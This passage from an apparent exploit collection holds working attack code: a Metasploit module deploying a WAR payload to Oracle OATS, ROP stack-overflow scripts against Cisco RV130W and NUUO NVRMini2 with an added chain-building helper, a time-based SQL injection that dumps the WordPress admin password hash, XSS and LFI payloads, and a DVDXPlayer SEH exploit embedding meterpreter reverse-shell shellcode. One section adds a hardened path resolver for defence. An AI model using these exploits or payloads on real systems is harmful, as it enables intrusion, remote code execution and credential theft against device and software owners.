  def set_frsc
    value = get_deploy_frsc
    @frsc = value
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')
    })

    if res && res.body.include?('Oracle WebLogic Server Administration Console')
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  def set_admin_console_session(res)
    cookie = res.get_cookies
    admin_console_session = cookie.scan(/ADMINCONSOLESESSION=(.+);/).flatten.first
    vprint_status("Token for console session is: #{admin_console_session}")
    login_spec.admin_console_session = admin_console_session
  end

  def is_logged_in?(res)
    html = res.get_html_document
    a_element = html.at('a')
    if a_element.respond_to?(:attributes) && a_element.attributes['href']
      link = a_element.attributes['href'].value
      return URI(link).request_uri == '/console'
    end

    false
  end

  def do_login
    uri = normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => uri
    })
    fail_with(Failure::Unknown, 'No response from server') unless res
    set_admin_console_session(res)

    uri = normalize_uri(target_uri.path, 'console', 'j_security_check')
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => uri,
      'cookie'    => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_post' => {
        'j_username'           => datastore['OATSUSERNAME'],
        'j_password'           => datastore['OATSPASSWORD'],
        'j_character_encoding' => 'UTF-8'
      }
    })
    fail_with(Failure::Unknown, 'No response while trying to log in') unless res
    fail_with(Failure::NoAccess, 'Failed to login') unless is_logged_in?(res)
    store_valid_credential(user: datastore['OATSUSERNAME'], private: datastore['OATSPASSWORD'])
    set_admin_console_session(res)
  end

  def get_deploy_frsc
    # First we are just going through the pages in a specific order to get the FRSC value
    # we need to prepare uploading the WAR file.
    res = nil
    requests = [
      { path: 'console/', vars: {} },
      { path: 'console/console.portal', vars: {'_nfpb'=>"true"} },
      { path: 'console/console.portal', vars: {'_nfpb'=>"true", '_pageLabel' => 'HomePage1'} }
    ]

    requests.each do |req|
      res = send_request_cgi({
        'method'   => 'GET',
        'uri'      => normalize_uri(target_uri.path, req[:path]),
        'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
        'vars_get' => req[:vars]
      })
      fail_with(Failure::Unknown, 'No response while retrieving FRSC') unless res
    end

    html = res.get_html_document
    hidden_input = html.at('input[@name="ChangeManagerPortletfrsc"]')
    frsc_attr = hidden_input.respond_to?(:attributes) ? hidden_input.attributes['value'] : nil
    frsc_attr ? frsc_attr.value : ''
  end

  def do_select_upload_action
    action = '/com/bea/console/actions/app/install/selectUploadApp'
    app_path = Rex::FileUtils.normalize_win_path(default_oats_path, 'oats\\servers\\AdminServer\\upload')
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'console', 'console.portal'),
      'cookie'    => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get'  => {
        'AppApplicationInstallPortlet_actionOverride' => action
      },
      'vars_post' => {
        'AppApplicationInstallPortletselectedAppPath' => app_path,
        'AppApplicationInstallPortletfrsc' => frsc
      }
    })
    fail_with(Failure::Unknown, "No response from #{action}") unless res
  end

  def do_upload_app_action
    action = '/com/bea/console/actions/app/install/uploadApp'
    ctype = 'application/octet-stream'
    app_cname = 'AppApplicationInstallPortletuploadAppPath'
    plan_cname = 'AppApplicationInstallPortletuploadPlanPath'
    frsc_cname = 'AppApplicationInstallPortletfrsc'
    war = war_payload.war
    war_name = war_payload.name

    post_data = Rex::MIME::Message.new
    post_data.add_part(war, ctype, 'binary', "form-data; name=\"#{app_cname}\"; filename=\"#{war_name}.war\"")
    post_data.add_part('', ctype, nil, "form-data; name=\"#{plan_cname}\"; filename=\"\"")
    post_data.add_part(frsc, nil, nil, "form-data; name=\"#{frsc_cname}\"")

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get' => {
        'AppApplicationInstallPortlet_actionOverride' => action
      },
      'ctype'    => "multipart/form-data; boundary=#{post_data.bound}",
      'data'     => post_data.to_s
    })
    fail_with(Failure::Unknown, "No response from #{action}") unless res
    print_response_message(res)
  end

  def do_app_select_action
    action = '/com/bea/console/actions/app/install/appSelected'
    war_name = war_payload.name
    app_path = Rex::FileUtils.normalize_win_path(default_oats_path, "oats\\servers\\AdminServer\\upload\\#{war_name}.war")
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'console', 'console.portal'),
      'cookie'    => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get'  => {
        'AppApplicationInstallPortlet_actionOverride' => action
      },
      'vars_post' => {
        'AppApplicationInstallPortletselectedAppPath' => app_path,
        'AppApplicationInstallPortletfrsc' => frsc
      }
    })
    fail_with(Failure::Unknown, "No response from #{action}") unless res
    print_response_message(res)
  end

  def do_style_select_action
    action = '/com/bea/console/actions/app/install/targetStyleSelected'
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'console', 'console.portal'),
      'cookie'    => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get'  => {
        'AppApplicationInstallPortlet_actionOverride' => action
      },
      'vars_post' => {
        'AppApplicationInstallPortlettargetStyle' => 'Application',
        'AppApplicationInstallPortletfrsc' => frsc
      }
    })
    fail_with(Failure::Unknown, "No response from #{action}") unless res
  end

  def do_finish_action
    action = '/com/bea/console/actions/app/install/finish'
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'console', 'console.portal'),
      'cookie'    => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get'  => {
        'AppApplicationInstallPortlet_actionOverride' => action
      },
      'vars_post' => {
        'AppApplicationInstallPortletname' => war_payload.name,
        'AppApplicationInstallPortletsecurityModel' => 'DDOnly',
        'AppApplicationInstallPortletstagingStyle' => 'Default',
        'AppApplicationInstallPortletplanStagingStyle' => 'Default',
        'AppApplicationInstallPortletfrsc' => frsc
      }
    })
    fail_with(Failure::Unknown, "No response from #{action}") unless res
    print_response_message(res)

    # 302 is a good enough indicator of a successful upload, otherwise
    # the server would actually return a 200 with an error message.
    res.code == 302
  end

  def print_response_message(res)
    html = res.get_html_document
    message_div = html.at('div[@class="message"]')
    if message_div
      msg = message_div.at('span').text
      print_status("Server replies: #{msg.inspect}")
    end
  end

  def deploy_war
    set_frsc
    print_status("FRSC value: #{frsc}")
    do_select_upload_action
    do_upload_app_action
    do_app_select_action
    do_style_select_action
    do_finish_action
  end

  def goto_war(name)
    print_good("Operation \"#{name}\" is a go!")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, name)
    })
    print_status("Code #{res.code} on \"#{name}\" request") if res
  end

  def undeploy_war
    war_name = war_payload.name
    handle = 'com.bea.console.handles.JMXHandle("com.bea:Name=oats,Type=Domain")'
    contents = %Q|com.bea.console.handles.AppDeploymentHandle("com.bea:Name=#{war_name},Type=AppDeployment")|
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'console', 'console.portal'),
      'cookie'    => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get'  => {
        'AppApplicationUninstallPortletreturnTo' => 'AppDeploymentsControlPage',
        'AppDeploymentsControlPortlethandle' => handle
      },
      'vars_post' => {
        # For some reason, the value given to the server is escaped twice.
        # The Metasploit API should do it at least once.
        'AppApplicationUninstallPortletchosenContents' => CGI.escape(contents),
        '_pageLabel' => 'AppApplicationUninstallPage',
        '_nfpb' => 'true',
        'AppApplicationUninstallPortletfrsc' => frsc
      }
    })

    if res && res.code == 302
      print_good("Successfully undeployed #{war_name}.war")
    else
      print_warning("Unable to successfully undeploy #{war_name}.war")
      print_warning('You may want to do so manually.')
    end
  end

  def cleanup
    undeploy_war if is_cleanup_ready
    super
  end

  def setup
    @is_cleanup_ready = false
    super
  end

  def exploit
    unless check == Exploit::CheckCode::Detected
      print_status('Target does not have the login page we are looking for.')
      return
    end

    do_login
    print_good("Logged in as #{datastore['OATSUSERNAME']}:#{datastore['OATSPASSWORD']}")
    print_status("Ready for war. Codename \"#{war_payload.name}\" at #{war_payload.war.length} bytes")
    result = deploy_war
    if result
      @is_cleanup_ready = true
      goto_war(war_payload.name)
    end
  end

  attr_reader :frsc
  attr_reader :is_cleanup_ready
end
16. # Exploit Title: IceWarp <=10.4.4 local file include
# Date: 02/06/2019
# Exploit Author: JameelNabbo
# Website: uitsec.com
# Vendor Homepage: http://www.icewarp.com
# Software Link: https://www.icewarp.com/downloads/trial/
# Version: 10.4.4
# Tested on: Windows 10
# CVE: CVE-2019-12593

POC:
http://example.com/webmail/calendar/minimizer/index.php?style=[LFI]

Example:
http://example.com/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
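The PoC above encodes the backslash as %5c, which matters: on the tested Windows host "\" is a path separator, so a filter that only looks for "../" never sees the traversal. The following Python is an added example (not code from the advisory or from IceWarp) of the vulnerable join next to a hardened resolver for the same style parameter. STYLE_DIR, the identifier allow-list and the function names are assumptions for illustration, not IceWarp's real layout.

```python
import posixpath
import re
from urllib.parse import unquote

# Hypothetical style directory; the advisory does not describe IceWarp's layout.
STYLE_DIR = "/var/www/webmail/calendar/minimizer/styles"
# A style is a short identifier; anything else has no business in this parameter.
STYLE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")


def traversal_attempt(style):
    """True when the single-decoded parameter walks out of its directory.
    '\\' is folded into '/' because Windows, the tested platform, accepts both."""
    decoded = unquote(style).replace("\\", "/")
    return decoded.startswith("/") or ".." in decoded.split("/")


def vulnerable_style_path(style, base=STYLE_DIR):
    """The bug class in one line: the decoded parameter is joined onto the base as-is."""
    return base + "/" + unquote(style)


def safe_style_path(style, base=STYLE_DIR):
    """Resolve ?style= against base or return None.
    Allow-list first; the containment check is defence in depth in case the
    allow-list is ever relaxed. Double encoding (%252e) fails the allow-list
    because the single decode leaves a literal '%' behind."""
    decoded = unquote(style).replace("\\", "/")
    if not STYLE_NAME.fullmatch(decoded):
        return None
    full = posixpath.normpath(posixpath.join(base, decoded))
    if full != base and not full.startswith(base + "/"):
        return None
    return full


if __name__ == "__main__":
    poc = "..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"
    print("vulnerable:", vulnerable_style_path(poc))
    print("hardened:  ", safe_style_path(poc))
```

Run with the PoC value and the vulnerable function hands back a path ending in `..\..\windows\win.ini`, while the hardened one returns None; `traversal_attempt` is the shape of check to put in front of a WAF rule or access-log scan, and it deliberately decodes only once, so the allow-list is what catches double-encoded variants.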
17. #!/usr/bin/python
# Exploit Title: Cisco RV130W Remote Stack Overflow
# Google Dork: n/a
# Date: Advisory Published: Feb 2019
# Exploit Author: @0x00string
# Vendor Homepage: cisco.com
# Software Link: https://www.cisco.com/c/en/us/products/routers/rv130w-wireless-n-multifunction-vpn-router/index.html
# Version: 1.0.3.44 and prior
# Tested on: 1.0.3.44
# CVE : CVE-2019-1663
#
# 0x357fc000 - libc base addr
# 0x35849144 - system() addr
#
# 0x0002eaf8 / 0x3582AAF8: pop {r4, r5, lr}; add sp, sp, #8; bx lr;
# 0x0000c11c / 0x3580811C: mov r2, r4; mov r0, r2; pop {r4, r5, r7, pc};
# 0x00041308 / 0x3583D308: mov r0, sp; blx r2;
#
# gadget 1     system()     junk   gadget 2     junk   junk   junk   junk   junk   gadget 3     text
# [0x3582AAF8][0x35849144][AAAA][0x3580811C][BBBB][CCCC][DDDD][EEEE][FFFF][0x3583D308][command]
#
# curl -k -X 'POST' --data "submit_button=login&submit_type=&gui_action=&default_login=1&wait_time=0&change_action=&enc=1&user=cisco&pwd=UUUUZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZVVVVWWWWXXXXYYYY`printf "\xf8\xaa\x82\x35\x44\x91\x84\x35AAAA\x1c\x81\x80\x35BBBBCCCCDDDDEEEEFFFF\x08\xd3\x83\x35ping 192.168.1.100\x00"`&sel_lang=EN" 'https://192.168.1.1:443/login.cgi'

import requests
import urllib3

# The router presents a self-signed certificate; this is the curl -k from the comment above.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def banner():
    print('''
@0x00string
https://github.com/0x00string/oldays/blob/master/CVE-2019-1663.py
''')


def main():
    banner()
    command = b"ping 192.168.1.100\x00"
    print("Sending exploit to execute [" + command.decode().rstrip("\x00") + "]\n")
    # gadget 1, system(), junk, gadget 2, five junk words (popped or skipped), gadget 3; see the layout above
    rop = (b"\xf8\xaa\x82\x35" + b"\x44\x91\x84\x35" + b"AAAA" + b"\x1c\x81\x80\x35"
           + b"BBBB" + b"CCCC" + b"DDDD" + b"EEEE" + b"FFFF" + b"\x08\xd3\x83\x35")
    # 446 bytes of padding reach the saved return address; the command follows the chain on the stack
    payload = (b"Z" * 446) + rop + command
    url = "https://192.168.1.100:443/login.cgi"
    data = {
        'submit_button': 'login', 'submit_type': '', 'gui_action': '', 'default_login': '1',
        'wait_time': '0', 'change_action': '', 'enc': '1', 'user': 'cisco', 'pwd': payload,
        'sel_lang': 'EN',
    }
    # the form body goes in data= (the original passed payload=, which requests does not accept)
    r = requests.post(url, data=data, verify=False)
    print("HTTP %d" % r.status_code)


if __name__ == "__main__":
    main()
18. #!/usr/bin/python
# Exploit Title: NUUO NVRMini2 3.9.1 'sscanf' stack overflow
# Google Dork: n/a
# Date: Advisory Published: Nov 18
# Exploit Author: @0x00string
# Vendor Homepage: nuuo.com
# Software Link: https://www.nuuo.com/ProductNode.php?node=2
# Version: 3.9.1 and prior
# Tested on: 3.9.1
# CVE : CVE-2018-19864
#
# [ leading / ]
# [ Padding x 335 ]
# [ original value at stack pointer + 158 ]
# [ padding x 80 ]
# [ address of (pop {r3,lr} ; bx lr) ]
# [ system() address ]
# [ address of (mov r0,sp ; blx r3) ]
# [ command to execute ]

import getopt
import sys
from socket import socket, AF_INET, SOCK_STREAM


def banner():
    print('''
@0x00string
https://github.com/0x00string/oldays/blob/master/CVE-2018-19864.py
''')


def usage():
    print("python script.py <args>\n"
          " -h, --help: Show this message\n"
          " -a, --rhost: Target IP address\n"
          " -b, --rport: Target Port - default 5150\n"
          " -c, --command: Command to execute\n"
          "\n"
          "Example:\n"
          "python script.py -a 10.10.10.10\n"
          "python script.py -a 10.10.10.10 -b 1234 -c reboot\n")
    exit()


def main():
    rhost = None
    rport = "5150"
    command = "{/bin/touch,/tmp/hax}"
    banner()
    options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh', ['rhost=', 'rport=', 'command=', 'help'])
    for opt, arg in options:
        if opt in ('-h', '--help'):
            usage()
        elif opt in ('-a', '--rhost'):
            rhost = arg
        elif opt in ('-b', '--rport'):
            rport = arg
        elif opt in ('-c', '--command'):
            command = arg
    if rhost is None:
        usage()
    print("Sending exploit to execute [" + command + "]\n")
    # layout as in the stack diagram above
    buf = (b"GET /"
           + (b"Z" * 335)
           + b"\x30\x2a\x17\x45"   # original value at stack pointer + 158
           + (b"Y" * 80)
           + b"\x08\xfc\x78\x40"   # pop {r3, lr}; bx lr
           + b"\x44\xe0\x17\x40"   # system()
           + b"\xcc\xb7\x77\x40"   # mov r0, sp; blx r3
           + command.encode()
           + b" HTTP/1.1\r\nHost: " + ("http://" + rhost + ":" + rport).encode() + b"\r\n\r\n")
    sock = socket(AF_INET, SOCK_STREAM)
    sock.settimeout(30)
    sock.connect((rhost, int(rport)))   # the original referenced undefined target_ip/target_port
    sock.send(buf)
    print("done\n")


if __name__ == "__main__":
    main()
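Posts 17 and 18 use the same ARM return-to-libc shape: get system() into a register, then a `mov r0, sp; blx rN` gadget so the command text sitting on the stack right after the chain becomes argv. The Python below is an added example (not @0x00string's code) that rebuilds both chains from the addresses in the two headers, packs them properly instead of hand-written escape strings, and checks them for bytes the vulnerable copy would stop at. The Cisco addresses are computed as libc base + offset from the header; the system() offset 0x4d144 is derived from the two absolute values given there. The stop-byte sets are assumptions: a NUL for the RV130W pwd field (the PoC's command is NUL-terminated), and whitespace for the NVRMini2 sscanf("%s") token, which is presumably why the default NUUO command uses bash brace expansion instead of a space.

```python
import struct


def p32(value):
    """Pack one little-endian 32-bit word (both routers run little-endian ARM)."""
    return struct.pack("<I", value)


def build_chain(items):
    """Lay out a chain: ints become packed words, bytes go in verbatim."""
    return b"".join(p32(item) if isinstance(item, int) else item for item in items)


def stop_bytes(chain, bad):
    """Offsets of bytes the vulnerable copy would stop at; a usable chain has none."""
    return [off for off, b in enumerate(chain) if b in bad]


# Cisco RV130W (CVE-2019-1663). libc sits at a fixed base, so every address is
# base + file offset; the offsets are the ones listed in the exploit header.
RV130W_LIBC_BASE = 0x357fc000
RV130W_OFF = {
    "system":       0x0004d144,  # 0x357fc000 + 0x4d144 == 0x35849144, the system() address
    "pop_r4_r5_lr": 0x0002eaf8,  # pop {r4, r5, lr}; add sp, sp, #8; bx lr
    "mov_r2_r4":    0x0000c11c,  # mov r2, r4; mov r0, r2; pop {r4, r5, r7, pc}
    "mov_r0_sp":    0x00041308,  # mov r0, sp; blx r2
}
# Assumption: pwd is copied as a C string, so a NUL would end the chain early.
RV130W_STOP = b"\x00"


def rv130w_rop(libc_base=RV130W_LIBC_BASE):
    """Three gadgets that end in system(<whatever follows the chain on the stack>)."""
    g = {name: libc_base + off for name, off in RV130W_OFF.items()}
    return build_chain([
        g["pop_r4_r5_lr"],
        g["system"],                 # -> r4
        b"AAAA",                     # -> r5
        g["mov_r2_r4"],              # -> lr, reached by bx lr
        b"BBBB", b"CCCC",            # skipped by add sp, sp, #8
        b"DDDD", b"EEEE", b"FFFF",   # -> r4, r5, r7 in gadget 2; r2 now holds system()
        g["mov_r0_sp"],              # -> pc; r0 = sp = the command text, then blx r2
    ])


def rv130w_pwd(command, pad_len=446):
    """Complete 'pwd' field: padding to the saved return address, chain, NUL-terminated command."""
    return b"Z" * pad_len + rv130w_rop() + command + b"\x00"


# NUUO NVRMini2 (CVE-2018-19864). Fixed addresses straight from the PoC header.
NVR_SAVED_WORD = 0x45172a30  # original value at sp + 158, restored so the function returns cleanly
NVR_POP_R3_LR  = 0x4078fc08  # pop {r3, lr}; bx lr
NVR_SYSTEM     = 0x4017e044  # system()
NVR_MOV_R0_SP  = 0x4077b7cc  # mov r0, sp; blx r3
# Assumption: the overflowed sscanf("%s") token ends at whitespace, hence the PoC's
# brace-expansion command "{/bin/touch,/tmp/hax}" instead of "/bin/touch /tmp/hax".
NVR_STOP = b"\x00 \t\r\n"


def nvrmini2_path(command):
    """Everything after 'GET /': padding, restored word, padding, two gadgets, command."""
    return build_chain([
        b"Z" * 335,
        NVR_SAVED_WORD,
        b"Y" * 80,
        NVR_POP_R3_LR,
        NVR_SYSTEM,      # -> r3
        NVR_MOV_R0_SP,   # -> lr; r0 = sp = command, blx r3 calls system(command)
        command,
    ])


def nvrmini2_request(command, rhost, rport=5150):
    """The full HTTP request the NUUO PoC sends over the socket."""
    host = ("%s:%d" % (rhost, rport)).encode()
    return b"GET /" + nvrmini2_path(command) + b" HTTP/1.1\r\nHost: " + host + b"\r\n\r\n"


if __name__ == "__main__":
    print("RV130W chain:", rv130w_rop().hex())
    print("NVRMini2 tail:", nvrmini2_path(b"{/bin/touch,/tmp/hax}")[-40:])
```

Both builders reproduce the exact byte strings in the two PoCs, which is the point of rebasing from offsets: if a different firmware build moves libc, only RV130W_LIBC_BASE changes and the chain still assembles, while `stop_bytes` tells you immediately if a rebased gadget picked up a terminator byte.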
19. # Exploit Title: AUO Solar Data Recorder - Incorrect Access Control
# Date: 2019-04-16
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.auo.com/zh-TW
# Version: AUO Solar Data Recorder all versions prior to v1.3.0
# Tested on: It is a proprietary device: https://solar.auo.com/en-global/Support_Download_Center/index
# CVE: CVE-2019-11367

# 1. Description:
# The AUO Solar Data Recorder web page uses HTTP Basic Access Authentication.
# Once a user accesses the files under the path http://<host>/protect/,
# the website responds with the plaintext account and password in the WWW-Authenticate attribute.
# Attackers are able to log in to the AUO Solar Data Recorder successfully.

# 2. Proof of Concept:
# Access the files under the path http://<host>/protect/ of the AUO Solar Data Recorder.
# The website uses HTTP Basic Access Authentication,
# and responds with the plaintext account and password in the WWW-Authenticate attribute.
# By using the account and password from the HTTP response,
# anyone can log in to the AUO Solar Data Recorder successfully.
20. # -*- coding: utf-8 -*-
# Exploit Title: WordPress Plugin Form Maker 1.13.3 - SQL Injection
# Date: 22-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://10web.io/plugins/
# Software Link: https://wordpress.org/plugins/form-maker/
# Version: 1.13.3
# Tested on: Ubuntu 18.04
# CVE : CVE-2019-10866

import requests
import time

# asc_or_desc is appended to ORDER BY without sanitisation; the injected CASE expression
# sleeps only when the guessed byte of wp_users.user_pass (id=1) matches
url_vuln = 'http://localhost/wordpress/wp-admin/admin.php?page=submissions_fm&task=display&current_id=2&order_by=group_id&asc_or_desc='
session = requests.Session()
dictionary = '@._-$/\\"£%&;§+*1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'
flag = True
username = "username"
password = "password"
temp_password = ""
TIME = 0.5


def login(username, password):
    payload = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Login',
        'redirect_to': 'http://localhost/wordpress/wp-admin/',
        'testcookie': 1
    }
    session.post('http://localhost/wordpress/wp-login.php', data=payload)


def print_string(text):
    print("\033c")
    print(text)


def get_admin_pass():
    len_pwd = 1
    global flag
    global temp_password
    while flag:
        flag = False
        ch_temp = ''
        for ch in dictionary:
            print_string("[*] Password dump: " + temp_password + ch)
            ch_temp = ch
            start_time = time.time()
            r = session.get(url_vuln + ',(case+when+(select+ascii(substring(user_pass,' + str(len_pwd) + ',' + str(len_pwd) + '))+from+wp_users+where+id%3d1)%3d' + str(ord(ch)) + '+then+(select+sleep(' + str(TIME) + ')+from+wp_users+limit+1)+else+2+end)+asc%3b')
            elapsed_time = time.time() - start_time
            # a response slower than the sleep() means the comparison was true
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            temp_password += ch_temp
            len_pwd += 1


login(username, password)
get_admin_pass()
print_string("[+] Password found: " + temp_password)
21. # Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SiteLookup.do
# Date: 2019-06-04
# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup)
# Vendor Homepage: https://www.manageengine.com/products/service-desk
# Version: Zoho ManageEngine ServiceDesk Plus 9.3
# CVE : CVE-2019-12538

Information Description:
An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SiteLookup.do qc_siteID parameter.

Attack vector:
domain/SiteLookup.do?configID=0&SELECTSITE=qc_siteID"/><svg onload=alert('XSS')>&userConfigID=21111111&SELECTEDSITEID=1&SELECTEDSITENAME=

PoC:
https://drive.google.com/file/d/1Oo_lC_XCtAiF2Gvx_ZoS8Yqwunc1U_57/view
22. # Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SearchN.do
# Date: 2019-06-04
# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup)
# Vendor Homepage: https://www.manageengine.com/products/service-desk
# Version: Zoho ManageEngine ServiceDesk Plus 9.3
# CVE : CVE-2019-12542

An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SearchN.do userConfigID parameter.

Attack vector:
domain/SearchN.do?searchText=a&SELECTEDSITEID=1&SELECTEDSITENAME=&configID=0&SELECTSITE=qc_siteID&submitbutton=Go&userConfigID=21111111ucgol"><img src%3da onerror%3dalert('XSS')>qzmm3u7id8z&selectName=Site

PoC:
https://drive.google.com/file/d/1aJN6GudSd7WWckXWxA5nelM48Xib9eS9/view
23. # Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via PurchaseRequest.do
# Date: 2019-06-04
# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup)
# Vendor Homepage: https://www.manageengine.com/products/service-desk
# Version: Zoho ManageEngine ServiceDesk Plus 9.3
# CVE : CVE-2019-12543

Information Description:
An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the PurchaseRequest.do serviceRequestId parameter.

Attack vector:
domain/PurchaseRequest.do?operation=getAssociatedPrsForSR&serviceRequestId=g24aj%3Cimg%20src%3da%20onerror%3dalert(%27XSS%27)%3Eqdaxl

PoC:
https://drive.google.com/file/d/1pHeq446oNonw5ZJ53idKhP8gC-9CZtQW/view
24. # Exploit Title: DVDXPlayer 5.5 Pro Local Buffer Overflow with SEH
# Date: 6-3-2019
# Exploit Author: Kevin Randall
# Vendor Homepage: http://www.dvd-x-player.com/download.html#dvdPlayer
# Software Link: http://www.dvd-x-player.com/download.html#dvdPlayer
# Version: 5.5 Pro
# Tested on: Windows 7
# CVE : N/A

#!/usr/bin/python
###########Create Shellcode with MSFVenom###############################################################################################
##msfvenom shellcode generate: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.9 LPORT=4444 -b '\x00\x0A\x0D\x1A' -f python
########################################################################################################################################

file_name = "payloadofficial.plf"

#######################Copy and Paste Shellcode Here!!###########################
buf = b""
buf += b"\xd9\xe8\xb8\xa0\x7e\x18\xef\xd9\x74\x24\xf4\x5f\x2b"
buf += b"\xc9\xb1\x56\x31\x47\x18\x83\xef\xfc\x03\x47\xb4\x9c"
buf += b"\xed\x13\x5c\xe2\x0e\xec\x9c\x83\x87\x09\xad\x83\xfc"
buf += b"\x5a\x9d\x33\x76\x0e\x11\xbf\xda\xbb\xa2\xcd\xf2\xcc"
buf += b"\x03\x7b\x25\xe2\x94\xd0\x15\x65\x16\x2b\x4a\x45\x27"
buf += b"\xe4\x9f\x84\x60\x19\x6d\xd4\x39\x55\xc0\xc9\x4e\x23"
buf += b"\xd9\x62\x1c\xa5\x59\x96\xd4\xc4\x48\x09\x6f\x9f\x4a"
buf += b"\xab\xbc\xab\xc2\xb3\xa1\x96\x9d\x48\x11\x6c\x1c\x99"
buf += b"\x68\x8d\xb3\xe4\x45\x7c\xcd\x21\x61\x9f\xb8\x5b\x92"
buf += b"\x22\xbb\x9f\xe9\xf8\x4e\x04\x49\x8a\xe9\xe0\x68\x5f"
buf += b"\x6f\x62\x66\x14\xfb\x2c\x6a\xab\x28\x47\x96\x20\xcf"
buf += b"\x88\x1f\x72\xf4\x0c\x44\x20\x95\x15\x20\x87\xaa\x46"
buf += b"\x8b\x78\x0f\x0c\x21\x6c\x22\x4f\x2d\x41\x0f\x70\xad"
buf += b"\xcd\x18\x03\x9f\x52\xb3\x8b\x93\x1b\x1d\x4b\xa2\x0c"
buf += b"\x9e\x83\x0c\x5c\x60\x24\x6c\x74\xa7\x70\x3c\xee\x0e"
buf += b"\xf9\xd7\xee\xaf\x2c\x4d\xe5\x27\x0f\x39\xf9\xbe\xe7"
buf += b"\x3b\xfa\xd1\xab\xb2\x1c\x81\x03\x94\xb0\x62\xf4\x54"
buf += b"\x61\x0b\x1e\x5b\x5e\x2b\x21\xb6\xf7\xc6\xce\x6e\xaf"
buf += b"\x7e\x76\x2b\x3b\x1e\x77\xe6\x41\x20\xf3\x02\xb5\xef"
buf += b"\xf4\x67\xa5\x18\x63\x87\x35\xd9\x06\x87\x5f\xdd\x80"
buf += b"\xd0\xf7\xdf\xf5\x16\x58\x1f\xd0\x25\x9f\xdf\xa5\x1f"
buf += b"\xeb\xd6\x33\x1f\x83\x16\xd4\x9f\x53\x41\xbe\x9f\x3b"
buf += b"\x35\x9a\xcc\x5e\x3a\x37\x61\xf3\xaf\xb8\xd3\xa7\x78"
buf += b"\xd1\xd9\x9e\x4f\x7e\x22\xf5\xd3\x79\xdc\x8b\xfb\x21"
buf += b"\xb4\x73\xbc\xd1\x44\x1e\x3c\x82\x2c\xd5\x13\x2d\x9c"
buf += b"\x16\xbe\x66\xb4\x9d\x2f\xc4\x25\xa1\x65\x88\xfb\xa2"
buf += b"\x8a\x11\x0c\xd8\xe3\xa6\xed\x1d\xea\xc2\xee\x1d\x12"
buf += b"\xf5\xd3\xcb\x2b\x83\x12\xc8\x0f\x9c\x21\x6d\x39\x37"
buf += b"\x49\x21\x39\x12"
#################################################################################

#No Operations#
nops = b"\x90" * 20
shellcode = nops + buf

####Where all the magic happens! :)#####################################################################
# 608 bytes reach the SEH record: nSEH = short jump over the handler address, SEH = 0x6164172E,
# then the NOP sled and shellcode, padded out to 1384 bytes
buffer = b"A" * 608 + b"\xEB\x06\x90\x90" + b"\x2E\x17\x64\x61" + shellcode + b"D" * (1384 - len(shellcode))
########################################################################################################

with open(file_name, "wb") as plf_file:
    plf_file.write(buffer)
